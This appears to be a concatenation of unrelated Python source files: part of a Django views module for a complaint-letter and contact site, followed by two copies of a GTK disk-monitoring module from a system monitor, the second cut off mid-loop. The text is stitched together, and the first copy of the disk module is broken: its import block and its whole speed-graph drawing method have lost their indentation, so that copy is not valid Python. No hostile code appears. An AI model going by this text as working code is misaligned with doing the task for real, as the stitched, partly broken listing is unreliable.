    return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))
def myProfile(request):
    """
    Build the profile-page context, preferring the custom UserProfile data
    and falling back to the built-in auth user fields when no profile exists.
    """
    data = {}
    data['first_name'] = request.user.first_name
    data['last_name'] = request.user.last_name
    data['email'] = request.user.email
    # If the user has a UserProfile, pull from that data.
    try:
        profile = UserProfile.objects.get(user=request.user)
        data['email'] = profile.my_email
        data['first_name'] = profile.my_first_name
        data['last_name'] = profile.my_last_name
        data['phone'] = profile.phone
        data['address'] = profile.address
        data['city'] = profile.city
        data['state'] = profile.state
        data['zip_code'] = profile.zip_code
        data['favorites'] = []
        for fav in Favorite.objects.filter(user=profile):
            # Compare names, not model instances: the original compared the
            # Favorite object against a list of name strings, so the
            # duplicate check never triggered.
            if fav.name not in data['favorites']:
                data['favorites'].append(fav.name)
    # Otherwise keep the standard auth user data set above.
    except UserProfile.DoesNotExist:
        data['email'] = request.user.email
        data['first_name'] = request.user.first_name
        data['last_name'] = request.user.last_name
    data['categories'] = list(Category.objects.all())
    return render(request, "my-profile.html", data)
def myProfileAction(request):
    """
    Create or update the requesting user's UserProfile from the submitted
    form, replacing the stored favorites with the newly chosen ones.
    """
    data_in = request.POST.copy()
    try:
        # Existing profile: drop its favorites so the submission replaces them.
        new_profile = UserProfile.objects.get(user=request.user)
        # Reuse the profile just fetched instead of querying a second time.
        Favorite.objects.filter(user=new_profile).delete()
    except UserProfile.DoesNotExist:
        # First submission: create a profile extending the default auth user.
        new_profile = UserProfile()
        new_profile.user = User.objects.get(id=request.user.id)
    new_profile.my_first_name = data_in['first_name']
    new_profile.my_last_name = data_in['last_name']
    new_profile.my_email = data_in['email']
    new_profile.phone = data_in['phone']
    new_profile.address = data_in['address']
    new_profile.city = data_in['city']
    new_profile.state = data_in['state']
    new_profile.zip_code = data_in['zip_code']
    # Save the profile *before* creating favorites: a brand-new profile must
    # have a primary key before Favorite rows can reference it (the original
    # saved it last, which fails for unsaved related objects).
    new_profile.save()
    # Add every favorite the user chose on the form.
    for fav_name in request.POST.getlist('favorites[]'):
        new_fav = Favorite()
        new_fav.name = fav_name
        new_fav.user = new_profile
        new_fav.save()
    return redirect('/')
def feedback(request):
    """Render the feedback form; on POST, store the message as a Suggestion."""
    categories_list = list(Category.objects.all())
    if request.method == "POST":
        suggestion = Suggestions()
        suggestion.name = request.POST.get('name')
        suggestion.email = request.POST.get('email')
        suggestion.subject = request.POST.get('subject')
        suggestion.message = request.POST.get('message')
        suggestion.save()
        return redirect("/thankyou/")
    return render(request, 'feedback.html', {'categories': categories_list})
def thankyou(request):
    """Render the static thank-you page."""
    return render(request, "thankyou.html")
def logout_view(request):
    """Log the user out, then render the logout confirmation page."""
    logout(request)
    return render(request, "logout.html")
def generate(request):
    """Compose a complaint-letter body from the form input and profile data."""
    data_in = request.POST.copy()
    try:
        # Contact details come from the custom profile when it exists.
        profile = UserProfile.objects.get(user=request.user)
        email = profile.my_email
        first_name = profile.my_first_name
        last_name = profile.my_last_name
        phone = profile.phone
    except UserProfile.DoesNotExist:
        email = request.user.email
        first_name = request.user.first_name
        last_name = request.user.last_name
        phone = '123-456-7890'
    category = data_in['category']
    body = data_in['text']
    level = data_in['level']
    # Assemble the full letter; the wording and whitespace match the
    # original concatenation exactly.
    text = (
        f"To whom it may concern, \n\nMy name is {first_name} {last_name}"
        f" and I am writing to you about the issue of {category}:\n\n\b{body}"
        f"\n\nIf you wish to contact me, my phone number is {phone} and my email address is {email}"
        f".\n\nSincerely, \n{first_name} {last_name}"
    )
    return render(request, "generate.html", {'text': text, 'category': category, 'level': level})
def contact_form(request):
    """
    Show the contact form pre-filled from the user's profile; on a valid POST,
    email the message to the chosen recipient and redirect to the thank-you
    page.
    """
    try:
        profile = UserProfile.objects.get(user=request.user)
        email = profile.my_email
        first_name = profile.my_first_name
        last_name = profile.my_last_name
    except UserProfile.DoesNotExist:
        email = request.user.email
        first_name = request.user.first_name
        last_name = request.user.last_name
    form = ContactForm(initial={'email': email, 'name': first_name + ' ' + last_name})
    text = request.GET.get('text', '')
    if request.method == 'POST':
        form = ContactForm(request.POST)
        if form.is_valid():
            subject = f'Civic Connect Message from: {form.cleaned_data["name"]}'
            posted = request.POST.copy()
            message = posted["message"]
            sender = "hondacivicsuva@gmail.com"
            recipients = [posted["recipient_email"]]
            try:
                send_mail(subject, message, sender, recipients, fail_silently=True)
            except BadHeaderError:
                return HttpResponse('Invalid header found')
            return redirect("/thankyou/")
    return render(request, "contact.html", {'form': form, 'text': text})
# Contact From/ Sendgrid template taken from: https://github.com/the-kodechamp/django_blog_tutorial/blob/master/blog/templates
|
#!/usr/bin/env python3
# import gi
# gi.require_version("Gtk", "3.24")
from gi.repository import Gtk as g,Gdk
import psutil as ps
from time import time
from os import popen
# Importing neccessary files
try:
from gi_composites import GtkTemplate
except ImportError:
from sysmontask.gi_composites import GtkTemplate
if __name__=='sysmontask.disk':
from sysmontask.sysmontask import files_dir
from sysmontask.gproc import sorting_func,byte_to_human
else:
from sysmontask import files_dir
from gproc import sorting_func,byte_to_human
@GtkTemplate(ui=files_dir+'/disk.glade')
class diskTabWidget(g.ScrolledWindow):
    """
    A disk tab widget(top level box with all childs fields) which is made by the gtk template.
    """
    # Required else you would need to specify the full module
    # name in mywidget.ui (__main__+MyWidget)
    __gtype_name__ = 'diskTabWidget'
    # Template children: each attribute name must match a widget id in
    # disk.glade; GtkTemplate wires them up when init_template() runs.
    disktextlabel= GtkTemplate.Child()
    diskinfolabel = GtkTemplate.Child()
    diskdrawarea1=GtkTemplate.Child()
    diskdrawarea2=GtkTemplate.Child()
    # NOTE(review): 'disktextlabel' is assigned a second time here (see above);
    # the rebind looks like a leftover duplicate — confirm before removing.
    disktextlabel=GtkTemplate.Child()
    diskactivelabelvalue=GtkTemplate.Child()
    diskreadlabelvalue=GtkTemplate.Child()
    diskwritelabelvalue=GtkTemplate.Child()
    diskcurrenspeedlabelvalue=GtkTemplate.Child()
    diskUsagesTreeView=GtkTemplate.Child()
    disk_read_color_descriptor= GtkTemplate.Child()
    disk_write_color_descriptor= GtkTemplate.Child()
    # Alternative way to specify multiple widgets
    #label1, entry = GtkTemplate.Child.widgets(2)
    def __init__(self):
        """Constructing the Disk Widget."""
        # NOTE(review): super(g.ScrolledWindow, self) starts the MRO lookup
        # *after* ScrolledWindow — confirm this is intentional for the
        # GtkTemplate initialisation order.
        super(g.ScrolledWindow, self).__init__()
        # This must occur *after* you initialize your base
        self.init_template()
        # Multiplier for the dynamic maximum of the speed graph's vertical scale.
        self.diskmxfactor=1
        # Back-reference to the main window object; set later via givedata().
        self.secondself=None # main class
    def givedata(self,secondself,index):
        """
        Method to pass the data to the class object from outside. And assign them to the local class variables.

        Parameters
        ----------
        secondself : the main class reference(the main self) which will be calling this function.
        index : index of the disk from several disks
        """
        # Per-disk history buffers shared with the main object (not copies).
        self.diskactiveArray=secondself.diskActiveArray[index]
        self.diskreadArray=secondself.diskReadArray[index]
        self.diskwriteArray=secondself.diskWriteArray[index]
        # Keep the main object around for color profiles during drawing.
        self.secondself=secondself
    @GtkTemplate.Callback
    def on_diskDrawArea1_draw(self,dr,cr):
        """
        Function Binding(for draw signal) for Disk Utilisation draw area.

        This function draw the Disk's Utilisation curves upons called by the queue of request in the updator
        function.

        Parameters
        ----------
        dr : the widget on which to draw the graph
        cr : the cairo surface object
        """
        cr.set_line_width(2)
        # Color Pofile setup
        color=self.secondself.color_profile['disk'][0]
        rectangle_color=self.secondself.color_profile['disk'][1]
        # Get the allocated width and height
        w=self.diskdrawarea1.get_allocated_width()
        h=self.diskdrawarea1.get_allocated_height()
        # Vertical step size (graph spans 0-100% utilisation)
        scalingfactor=h/100.0
        #creating outer rectangle
        # cr.set_source_rgba(.109,.670,.0588,1)
        cr.set_source_rgba(*rectangle_color,1)
        cr.set_line_width(3)
        cr.rectangle(0,0,w,h)
        cr.stroke()
        # creating grid lines (10x10 grid)
        verticalGap=int(h/10)
        horzontalGap=int(w/10)
        for i in range(1,10):
            # cr.set_source_rgba(.109,.670,.0588,1) #for changing the outer line color
            cr.set_source_rgba(*color,1)
            cr.set_line_width(0.5)
            cr.move_to(0,i*verticalGap)
            cr.line_to(w,i*verticalGap)
            cr.move_to(i*horzontalGap,0)
            cr.line_to(i*horzontalGap,h)
            cr.stroke()
        cr.stroke()
        # Horizontal step size (history buffer holds 100 samples)
        stepsize=w/99.0
        # Drawing the outer lines for the curve; (100 - value) flips the axis
        # so 100% utilisation is drawn at the top.
        # cr.set_source_rgba(.109,.670,.0588,1) #for changing the outer line color
        cr.set_source_rgba(*color,1)
        cr.set_line_width(1.5)
        cr.move_to(0,scalingfactor*(100-self.diskactiveArray[0])+2)
        for i in range(0,99):
            cr.line_to((i+1)*stepsize,scalingfactor*(100-self.diskactiveArray[i+1])+2)
        cr.stroke_preserve()
        # Filling the curve (path is closed via the bottom corners first)
        # cr.set_source_rgba(.431,1,.04,0.25) #for changing the fill color
        cr.set_source_rgba(*color,0.25)
        cr.line_to(w,h)
        cr.line_to(0,h)
        cr.move_to(0,scalingfactor*(100-self.diskactiveArray[0])+2)
        cr.fill()
        cr.stroke()
        return False
@GtkTemplate.Callback
def on_diskDrawArea2_draw(self,dr,cr):
"""
Function Binding(for draw signal) for disk speed draw area.
This function draw the Disk's Read and Write speed curves upon called by the queue of request generated in the
main updator function.
Parameters
----------
dr : the widget on which to draw the graph
cr : the cairo surface object
"""
cr.set_line_width(2)
# Color Pofile setup
color=self.secondself.color_profile['disk'][0]
rectangle_color=self.secondself.color_profile['disk'][1]
self.disk_read_color_descriptor.set_markup(f'<span size="20000" foreground="{'#%02x%02x%02x' % (int(color[0]*255), int(color[1]*255), int(color[2]*255))}">|</span>')
self.disk_write_color_descriptor.set_markup(f'<span size="20000" foreground="{'#%02x%02x%02x' % (int(color[0]*255), int(color[1]*255), int(color[2]*255))}">¦</span>')
# Get the allocated widht and height
w=self.diskdrawarea2.get_allocated_width()
h=self.diskdrawarea2.get_allocated_height()
# Speed step in MB/s is the step in which the maximum speed(vertical scale) will adjust for dynamic speeds, i.e, in multiples
# of this step.
speedstep=50
# The maximum read or write speeds in the buffer
maximumcurrentspeed=max(max(self.diskreadArray),max(self.diskwriteArray))
# The current maximum scale speed
currentscalespeed=self.diskmxfactor*speedstep
# vertical scale adjustment calculation, i.e, new maximum scale speed
if(currentscalespeed<maximumcurrentspeed):
while(currentscalespeed<maximumcurrentspeed):
self.diskmxfactor+=1
currentscalespeed=self.diskmxfactor*speedstep
else:
while(currentscalespeed>maximumcurrentspeed+speedstep and self.diskmxfactor>1):
self.diskmxfactor-=1
currentscalespeed=self.diskmxfactor*speedstep
# Setting new maximum scale label
self.diskcurrenspeedlabelvalue.set_text(str(currentscalespeed)+'MB/s')
# vertical scaling factor(step)
scalingfactor=h/currentscalespeed
#creating outer rectangle
# cr.set_source_rgba(.109,.670,.0588,1)
cr.set_source_rgba(*rectangle_color,1)
cr.set_line_width(3)
cr.rectangle(0,0,w,h)
cr.stroke()
# creating grid lines
verticalGap=int(h/10)
horzontalGap=int(w/10)
for i in range(1,10):
# cr.set_source_rgba(.109,.670,.0588,1) #for changing the grid line color
cr.set_source_rgba(*color,1)
cr.set_line_width(0.5)
cr.move_to(0,i*verticalGap)
cr.line_to(w,i*verticalGap)
cr.move_to(i*horzontalGap,0)
cr.line_to(i*horzontalGap,h)
cr.stroke()
cr.stroke()
# Horzontal step size
stepsize=w/99.0
## Read Speed ##
# Drawing the curve line
# cr.set_source_rgba(.109,.670,.0588,1) #for changing the outer line color
cr.set_source_rgba(*color,1)
cr.set_line_width(1.5)
cr.move_to(0,scalingfactor*(currentscalespeed-self.diskreadArray[0])+2)
for i in range(0,99):
cr.line_to((i+1)*stepsize,scalingfactor*(currentscalespeed-self.diskreadArray[i+1])+2)
cr.stroke_preserve()
# Filling the curve with solid color, the curve(shape) should be a closed then only it can be filled
# cr.set_source_rgba(.431,1,.04,0.25) #for changing the fill color
cr.set_source_rgba(*color,0.2)
cr.line_to(w,h)
cr.line_to(0,h)
cr.move_to(0,scalingfactor*(currentscalespeed-self.diskreadArray[i])+2)
cr.fill()
cr.stroke()
## Write Speed ##
# Drawing the outer lines for the curve
# cr.set_source_rgba(.207,.941,.682,1) #for changing the outer line color
cr.set_source_rgba(*color,1)
cr.set_line_width(1.5)
cr.move_to(0,scalingfactor*(currentscalespeed-self.diskwriteArray[0])+2)
# Dash line configuration
cr.set_dash([3.0,3.0])
for i in range(0,99):
cr.line_to((i+1)*stepsize,scalingfactor*(currentscalespeed-self.diskwriteArray[i+1])+2)
cr.stroke_preserve()
# Filling the curve
# cr.set_source_rgba(.207,.941,.682,0.3) #for changing the fill color
cr.set_source_rgba(*color,0.2)
cr.line_to(w,h)
cr.line_to(0,h)
cr.move_to(0,scalingfactor*(currentscalespeed-self.diskwriteArray[0])+2)
cr.fill()
cr.stroke()
return False
def diskinit(self):
    """
    Initilization of the Disk Components.

    Discovers physical disks via ``lsblk``, builds one :class:`diskTabWidget`
    per disk (added to ``self.performanceStack``), snapshots the initial
    psutil I/O counters, and fills per-disk partition list stores and the
    sample-history arrays used by the draw callbacks.

    NOTE(review): intended to be called with `self` being the main window
    object (it reads `self.performanceStack`, `self.stack_counter`, ...) —
    confirm against the caller.
    """
    # Declaring the lists to hold the name and size of the disks.
    self.disklist=[]
    self.disksize=[]
    # Getting the name and size of the disks using shell command, (excluding zrams)
    try:
        p=popen('lsblk -d | grep -e ^NAME -e disk')
        partitions=p.readlines()
        p.close()
        for parts in partitions:
            tempparts=parts.split()
            # Skip the header row and zram devices
            if 'NAME' not in tempparts[0] and 'zram' not in tempparts[0]:
                self.disklist.append(tempparts[0])
                self.disksize.append(tempparts[3])
                print(tempparts[0])
    except Exception as e:
        print(f"Failed to get Disks: {e}")
    # Declaring the lists and dictionaries for data holding
    self.diskWidgetList={}
    self.diskstate1=[]
    self.diskActiveArray=[]
    self.diskReadArray=[]
    self.diskWriteArray=[]
    self.numOfDisks=len(self.disklist)
    # For partition information
    self.diskPartitions={}
    self.diskListStores={}
    self.diskListStoreItrs={}
    partitions=ps.disk_partitions()
    # For scanning each disk
    for i in range(0,self.numOfDisks):
        # Creating a disk tab widget
        self.diskWidgetList[i]=diskTabWidget()
        # Adding to the stack
        self.performanceStack.add_titled(self.diskWidgetList[i],f'page{self.stack_counter}','Disk'+str(i))
        # For lookup of devices and their assigned page number
        self.device_stack_page_lookup[self.disklist[i]]=self.stack_counter
        # Incrementing the stack counter to be used for the side pane
        self.stack_counter+=1
        # Setting the labels for the disk at index i
        self.diskWidgetList[i].disktextlabel.set_text(self.disklist[i])
        self.diskWidgetList[i].diskinfolabel.set_text(self.disksize[i])
        # Getting the I/O counters of the disk
        disktemp=ps.disk_io_counters(perdisk=True)
        # Time of the previous data snapshot
        self.diskt1=time()
        # Storing the initial state of the different disks
        for drives in disktemp:
            if drives==self.disklist[i]:
                self.diskstate1.append(disktemp[drives])
        # Partition info: keep partitions whose device name contains this disk
        self.diskPartitions[i]=[]
        for part in partitions:
            if self.disklist[i] in part[0]:
                self.diskPartitions[i]+=[part]
        # ListStore for the treeview of disk storage
        self.diskListStores[i]=g.ListStore(str,str,str,str,str,int,bool)
        self.diskListStoreItrs[i]=[]  # list of iterators for each row for a disk
        # Storing the values in the list stores
        for part in self.diskPartitions[i]:
            temp=ps.disk_usage(part[1])
            itr=self.diskListStores[i].append([part[0],part[1],part[2],byte_to_human(temp[0],persec=False),byte_to_human(temp[1],persec=False),temp[3],False])
            self.diskListStoreItrs[i].append(itr)
        # Setting the model (liststore) for the treeview
        self.diskWidgetList[i].diskUsagesTreeView.set_model(self.diskListStores[i])
        # Iterating for making each column in the disk treeview
        for k,col in enumerate(['Device','MountPoint','Type','Total','Used']):
            # Text renderer
            renderer=g.CellRendererText()
            # Creating a column and assigning additional properties based on type
            if col=='Used':
                # 'Used' shows both the human-readable text and a progress bar
                column=g.TreeViewColumn(col)
                progRenderer=g.CellRendererProgress()
                column.pack_start(renderer,False)
                column.add_attribute(renderer,"text",4)
                column.pack_start(progRenderer,False)
                column.add_attribute(progRenderer,"value",5)
            else:
                column=g.TreeViewColumn(col,renderer,text=k)
            # Making each column sortable, resizable, and reorderable
            column.set_sort_column_id(k)
            column.set_resizable(True)
            column.set_reorderable(True)
            column.set_alignment(0)
            column.set_sort_indicator(True)
            # Appending the column to the disk treeview
            self.diskWidgetList[i].diskUsagesTreeView.append_column(column)
        # Setting the custom sorting function for column 3 (used column)
        self.diskListStores[i].set_sort_func(3,sorting_func,3)
        # Data-holding history arrays (100 samples each)
        self.diskActiveArray.append([0]*100)
        self.diskReadArray.append([0]*100)
        self.diskWriteArray.append([0]*100)
        # Providing the data to the disk tab widget class
        self.diskWidgetList[i].givedata(self,i)
def diskTabUpdate(self):
    """
    Function to periodically update DISKs statistics.

    Computes deltas against the previous psutil snapshot, refreshes the
    per-partition tree views and speed labels, and shifts the new samples
    into the 100-entry history arrays consumed by the draw callbacks.
    """
    # Per-disk I/O counters; each value is a psutil namedtuple with fields
    # (read_count, write_count, read_bytes, write_bytes, read_time,
    #  write_time, read_merged_count, write_merged_count, busy_time).
    # NOTE: the original annotation `dict(read_count, ...)` was not a valid
    # type expression; plain `dict` is used instead.
    disktemp: dict = ps.disk_io_counters(perdisk=True)
    self.diskt2=time()
    # Time elapsed since the previous update
    timediskDiff=self.diskt2-self.diskt1
    # Array for the current state
    self.diskstate2=[]
    # Updating the disk storage tree view (partitions)
    for i in range(0,self.numOfDisks):
        try:
            # New disk I/O state
            self.diskstate2.append(disktemp[self.disklist[i]])
            for j,part in enumerate(self.diskPartitions[i]):
                temp=ps.disk_usage(part[1])
                self.diskListStores[i].set(self.diskListStoreItrs[i][j],3,byte_to_human(temp[0],persec=False),4,byte_to_human(temp[1],persec=False),5,temp[3])
        except Exception as e:
            print(f"error in diskliststore: {e}")
    # Holds the per-disk active (utilisation) percentage strings
    self.diskActiveString=[]
    for i in range(0,self.numOfDisks):
        try:
            # Difference between current and previous disk state:
            # [read bytes, write bytes, busy time (ms)]
            diskDiff: list =[self.diskstate2[i].read_bytes-self.diskstate1[i].read_bytes
                ,self.diskstate2[i].write_bytes-self.diskstate1[i].write_bytes
                ,self.diskstate2[i].busy_time-self.diskstate1[i].busy_time]
            # Disk active (utilisation) percentage: busy ms / elapsed ms * 100
            active_percetage=int(diskDiff[2]/(10*timediskDiff))
            if active_percetage>100: active_percetage=100
            self.diskActiveString.append(f'{active_percetage}%')
            # Setting the info labels; 1024*1024=1048576 for MiB conversion
            self.diskWidgetList[i].diskactivelabelvalue.set_text(self.diskActiveString[i])
            self.diskWidgetList[i].diskreadlabelvalue.set_text("{:.1f} MiB/s".format(diskDiff[0]/(timediskDiff*1048576)))
            self.diskWidgetList[i].diskwritelabelvalue.set_text("{:.1f} MiB/s".format(diskDiff[1]/(timediskDiff*1048576)))
            # Updating the sample-holding arrays depending on the direction;
            # truthy means newest sample on the right
            if self.update_graph_direction:
                self.diskActiveArray[i].pop(0)
                self.diskActiveArray[i].append((diskDiff[2])/(10*timediskDiff))
                self.diskReadArray[i].pop(0)
                self.diskReadArray[i].append(diskDiff[0]/(timediskDiff*1048576))
                self.diskWriteArray[i].pop(0)
                self.diskWriteArray[i].append(diskDiff[1]/(timediskDiff*1048576))
            else:
                self.diskActiveArray[i].pop()
                self.diskActiveArray[i].insert(0,(diskDiff[2])/(10*timediskDiff))
                self.diskReadArray[i].pop()
                self.diskReadArray[i].insert(0,diskDiff[0]/((timediskDiff)*1048576))
                self.diskWriteArray[i].pop()
                self.diskWriteArray[i].insert(0,diskDiff[1]/((timediskDiff)*1048576))
            # Passing data to the disk tab widget class
            self.diskWidgetList[i].givedata(self,i)
        except Exception as e:
            print(f'error in disk update: {e}')
    # The current state/time becomes the previous one for the next update
    self.diskstate1=self.diskstate2
    self.diskt1=self.diskt2
| #!/usr/bin/env python3
# import gi
# gi.require_version("Gtk", "3.24")
from gi.repository import Gtk as g,Gdk
import psutil as ps
from time import time
from os import popen
# Importing neccessary files
try:
from gi_composites import GtkTemplate
except ImportError:
from sysmontask.gi_composites import GtkTemplate
if __name__=='sysmontask.disk':
from sysmontask.sysmontask import files_dir
from sysmontask.gproc import sorting_func,byte_to_human
else:
from sysmontask import files_dir
from gproc import sorting_func,byte_to_human
@GtkTemplate(ui=files_dir+'/disk.glade')
class diskTabWidget(g.ScrolledWindow):
    """
    A disk tab widget(top level box with all childs fields) which is made by the gtk template.
    """
    # Required else you would need to specify the full module
    # name in mywidget.ui (__main__+MyWidget)
    __gtype_name__ = 'diskTabWidget'
    # Declaring/Fetching/Assigning the required childs(name in the template should be the same as used here)
    disktextlabel= GtkTemplate.Child()
    diskinfolabel = GtkTemplate.Child()
    diskdrawarea1=GtkTemplate.Child()
    diskdrawarea2=GtkTemplate.Child()
    # NOTE(review): duplicate re-declaration of `disktextlabel` (already
    # declared above) — presumably redundant; confirm before removing.
    disktextlabel=GtkTemplate.Child()
    diskactivelabelvalue=GtkTemplate.Child()
    diskreadlabelvalue=GtkTemplate.Child()
    diskwritelabelvalue=GtkTemplate.Child()
    diskcurrenspeedlabelvalue=GtkTemplate.Child()
    diskUsagesTreeView=GtkTemplate.Child()
    disk_read_color_descriptor= GtkTemplate.Child()
    disk_write_color_descriptor= GtkTemplate.Child()
    # Alternative way to specify multiple widgets
    #label1, entry = GtkTemplate.Child.widgets(2)

    def __init__(self):
        """Constructing the Disk Widget."""
        super(g.ScrolledWindow, self).__init__()
        # This must occur *after* you initialize your base
        self.init_template()
        # For the scaling of maximum value on the graph
        self.diskmxfactor=1
        self.secondself=None # main class

    def givedata(self,secondself,index):
        """
        Method to pass the data to the class object from outside. And assign them to the local class variables.

        Parameters
        ----------
        secondself : the main class reference(the main self) which will be calling this function.
        index : index of the disk from several disks
        """
        self.diskactiveArray=secondself.diskActiveArray[index]
        self.diskreadArray=secondself.diskReadArray[index]
        self.diskwriteArray=secondself.diskWriteArray[index]
        self.secondself=secondself

    @GtkTemplate.Callback
    def on_diskDrawArea1_draw(self,dr,cr):
        """
        Function Binding(for draw signal) for Disk Utilisation draw area.
        This function draw the Disk's Utilisation curves upons called by the queue of request in the updator
        function.

        Parameters
        ----------
        dr : the widget on which to draw the graph
        cr : the cairo surface object
        """
        cr.set_line_width(2)
        # Color Pofile setup
        color=self.secondself.color_profile['disk'][0]
        rectangle_color=self.secondself.color_profile['disk'][1]
        # Get the allocated width and height
        w=self.diskdrawarea1.get_allocated_width()
        h=self.diskdrawarea1.get_allocated_height()
        # Vertical step size (utilisation is a fixed 0-100 scale)
        scalingfactor=h/100.0
        # Creating outer rectangle
        cr.set_source_rgba(*rectangle_color,1)
        cr.set_line_width(3)
        cr.rectangle(0,0,w,h)
        cr.stroke()
        # Creating grid lines
        verticalGap=int(h/10)
        horzontalGap=int(w/10)
        for i in range(1,10):
            cr.set_source_rgba(*color,1)
            cr.set_line_width(0.5)
            cr.move_to(0,i*verticalGap)
            cr.line_to(w,i*verticalGap)
            cr.move_to(i*horzontalGap,0)
            cr.line_to(i*horzontalGap,h)
            cr.stroke()
        cr.stroke()
        # Horizontal step size (100 samples across the width)
        stepsize=w/99.0
        # Drawing the outer lines for the curve
        cr.set_source_rgba(*color,1)
        cr.set_line_width(1.5)
        cr.move_to(0,scalingfactor*(100-self.diskactiveArray[0])+2)
        for i in range(0,99):
            cr.line_to((i+1)*stepsize,scalingfactor*(100-self.diskactiveArray[i+1])+2)
        cr.stroke_preserve()
        # Filling the curve (shape is closed via the bottom corners)
        cr.set_source_rgba(*color,0.25)
        cr.line_to(w,h)
        cr.line_to(0,h)
        cr.move_to(0,scalingfactor*(100-self.diskactiveArray[0])+2)
        cr.fill()
        cr.stroke()
        return False

    @GtkTemplate.Callback
    def on_diskDrawArea2_draw(self,dr,cr):
        """
        Function Binding(for draw signal) for disk speed draw area.
        This function draw the Disk's Read and Write speed curves upon called by the queue of request generated in the
        main updator function.

        Parameters
        ----------
        dr : the widget on which to draw the graph
        cr : the cairo surface object
        """
        cr.set_line_width(2)
        # Color Pofile setup
        color=self.secondself.color_profile['disk'][0]
        rectangle_color=self.secondself.color_profile['disk'][1]
        # Legend markers tinted with the curve color (hex conversion inline)
        self.disk_read_color_descriptor.set_markup(f'<span size="20000" foreground="{"#%02x%02x%02x" % (int(color[0]*255), int(color[1]*255), int(color[2]*255))}">|</span>')
        self.disk_write_color_descriptor.set_markup(f'<span size="20000" foreground="{"#%02x%02x%02x" % (int(color[0]*255), int(color[1]*255), int(color[2]*255))}">¦</span>')
        # Get the allocated width and height
        w=self.diskdrawarea2.get_allocated_width()
        h=self.diskdrawarea2.get_allocated_height()
        # Speed step in MB/s is the step in which the maximum speed (vertical
        # scale) will adjust for dynamic speeds, i.e., in multiples of this step.
        speedstep=50
        # The maximum read or write speed in the buffer
        maximumcurrentspeed=max(max(self.diskreadArray),max(self.diskwriteArray))
        # The current maximum scale speed
        currentscalespeed=self.diskmxfactor*speedstep
        # Vertical scale adjustment calculation, i.e., new maximum scale speed
        if(currentscalespeed<maximumcurrentspeed):
            while(currentscalespeed<maximumcurrentspeed):
                self.diskmxfactor+=1
                currentscalespeed=self.diskmxfactor*speedstep
        else:
            while(currentscalespeed>maximumcurrentspeed+speedstep and self.diskmxfactor>1):
                self.diskmxfactor-=1
                currentscalespeed=self.diskmxfactor*speedstep
        # Setting new maximum scale label
        self.diskcurrenspeedlabelvalue.set_text(str(currentscalespeed)+'MB/s')
        # Vertical scaling factor (pixels per MB/s)
        scalingfactor=h/currentscalespeed
        # Creating outer rectangle
        cr.set_source_rgba(*rectangle_color,1)
        cr.set_line_width(3)
        cr.rectangle(0,0,w,h)
        cr.stroke()
        # Creating grid lines
        verticalGap=int(h/10)
        horzontalGap=int(w/10)
        for i in range(1,10):
            cr.set_source_rgba(*color,1)
            cr.set_line_width(0.5)
            cr.move_to(0,i*verticalGap)
            cr.line_to(w,i*verticalGap)
            cr.move_to(i*horzontalGap,0)
            cr.line_to(i*horzontalGap,h)
            cr.stroke()
        cr.stroke()
        # Horizontal step size
        stepsize=w/99.0
        ## Read Speed ##
        # Drawing the curve line
        cr.set_source_rgba(*color,1)
        cr.set_line_width(1.5)
        cr.move_to(0,scalingfactor*(currentscalespeed-self.diskreadArray[0])+2)
        for i in range(0,99):
            cr.line_to((i+1)*stepsize,scalingfactor*(currentscalespeed-self.diskreadArray[i+1])+2)
        cr.stroke_preserve()
        # Filling the curve with solid color; the curve (shape) must be closed
        # before it can be filled
        cr.set_source_rgba(*color,0.2)
        cr.line_to(w,h)
        cr.line_to(0,h)
        # NOTE(review): uses the stale loop index `i` (=98) where the write
        # branch below uses [0]; this move_to only starts a degenerate subpath
        # before fill(), so it looks harmless — confirm before changing.
        cr.move_to(0,scalingfactor*(currentscalespeed-self.diskreadArray[i])+2)
        cr.fill()
        cr.stroke()
        ## Write Speed ##
        # Drawing the outer lines for the curve
        cr.set_source_rgba(*color,1)
        cr.set_line_width(1.5)
        cr.move_to(0,scalingfactor*(currentscalespeed-self.diskwriteArray[0])+2)
        # Dash line configuration
        cr.set_dash([3.0,3.0])
        for i in range(0,99):
            cr.line_to((i+1)*stepsize,scalingfactor*(currentscalespeed-self.diskwriteArray[i+1])+2)
        cr.stroke_preserve()
        # Filling the curve
        cr.set_source_rgba(*color,0.2)
        cr.line_to(w,h)
        cr.line_to(0,h)
        cr.move_to(0,scalingfactor*(currentscalespeed-self.diskwriteArray[0])+2)
        cr.fill()
        cr.stroke()
        return False
def diskinit(self):
    """
    Initilization of the Disk Components.

    Discovers physical disks via ``lsblk``, builds one :class:`diskTabWidget`
    per disk (added to ``self.performanceStack``), snapshots the initial
    psutil I/O counters, and fills per-disk partition list stores and the
    sample-history arrays used by the draw callbacks.

    NOTE(review): intended to be called with `self` being the main window
    object (it reads `self.performanceStack`, `self.stack_counter`, ...) —
    confirm against the caller.
    """
    # Declaring the lists to hold the name and size of the disks.
    self.disklist=[]
    self.disksize=[]
    # Getting the name and size of the disks using shell command, (excluding zrams)
    try:
        p=popen('lsblk -d | grep -e ^NAME -e disk')
        partitions=p.readlines()
        p.close()
        for parts in partitions:
            tempparts=parts.split()
            # Skip the header row and zram devices
            if 'NAME' not in tempparts[0] and 'zram' not in tempparts[0]:
                self.disklist.append(tempparts[0])
                self.disksize.append(tempparts[3])
                print(tempparts[0])
    except Exception as e:
        print(f"Failed to get Disks: {e}")
    # Declaring the lists and dictionaries for data holding
    self.diskWidgetList={}
    self.diskstate1=[]
    self.diskActiveArray=[]
    self.diskReadArray=[]
    self.diskWriteArray=[]
    self.numOfDisks=len(self.disklist)
    # For partition information
    self.diskPartitions={}
    self.diskListStores={}
    self.diskListStoreItrs={}
    partitions=ps.disk_partitions()
    # For scanning each disk
    for i in range(0,self.numOfDisks):
        # Creating a disk tab widget
        self.diskWidgetList[i]=diskTabWidget()
        # Adding to the stack
        self.performanceStack.add_titled(self.diskWidgetList[i],f'page{self.stack_counter}','Disk'+str(i))
        # For lookup of devices and their assigned page number
        self.device_stack_page_lookup[self.disklist[i]]=self.stack_counter
        # Incrementing the stack counter to be used for the side pane
        self.stack_counter+=1
        # Setting the labels for the disk at index i
        self.diskWidgetList[i].disktextlabel.set_text(self.disklist[i])
        self.diskWidgetList[i].diskinfolabel.set_text(self.disksize[i])
        # Getting the I/O counters of the disk
        disktemp=ps.disk_io_counters(perdisk=True)
        # Time of the previous data snapshot
        self.diskt1=time()
        # Storing the initial state of the different disks
        for drives in disktemp:
            if drives==self.disklist[i]:
                self.diskstate1.append(disktemp[drives])
        # Partition info: keep partitions whose device name contains this disk
        self.diskPartitions[i]=[]
        for part in partitions:
